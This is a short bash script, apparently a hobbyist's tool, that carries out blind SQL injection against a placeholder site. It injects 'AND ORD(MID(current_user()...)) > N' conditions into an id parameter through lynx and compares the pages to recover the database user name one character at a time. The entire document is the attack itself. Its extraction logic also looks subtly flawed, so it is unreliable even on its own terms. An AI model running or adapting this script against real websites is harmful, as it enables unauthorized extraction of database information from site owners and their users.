#!/bin/bash
# very simple blind sql injection test with userdump display
# ugly without character count
# http://kaneda.bohater.net
# idea from sqlmap

FOUND=0
DATA_ORG=`lynx --dump "http://bug.com/site?id=0"`

for Y in `seq 1 10`; do 

  for N in `seq 97 122`; do 
    let YY=$Y+1
    if [ $FOUND -ne 1 ] ; then
      DATA_NEW=`lynx --dump "http://bug.com/site?id=0 AND ORD(MID((current_user()), $Y, $YY)) > $N"`
      if [ "$DATA_ORG" != "$DATA_NEW" ] ; then
        echo -n `perl -e "print pack(\"C\",$N)"`
        FOUND=1
      fi  
    fi
  done

FOUND=0

done

echo